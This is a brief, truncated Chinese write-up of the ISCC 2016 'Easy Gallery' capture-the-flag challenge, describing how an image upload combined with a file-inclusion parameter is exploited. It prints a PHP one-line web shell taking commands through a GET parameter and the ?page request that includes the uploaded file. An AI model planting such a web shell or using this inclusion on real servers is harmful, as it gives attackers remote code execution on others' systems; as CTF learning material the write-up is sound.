ISCC 2016 Easy Gallery

Easy Gallery解題記錄 首先進入發現有一個文件上傳頁面 先上傳了一張.jpg文件 上傳得到一個id 通過view頁面可以查看到自己上傳的圖片,也可以看到圖片的保存路徑 多半是考文件包含 寫入一句話木馬<?php @eval($_GET['pass']);?> 發現?page可以插入payload:?page=./uploads/1581496316.jpg ./是當前目錄,即http:/
相關文章
相關標籤/搜索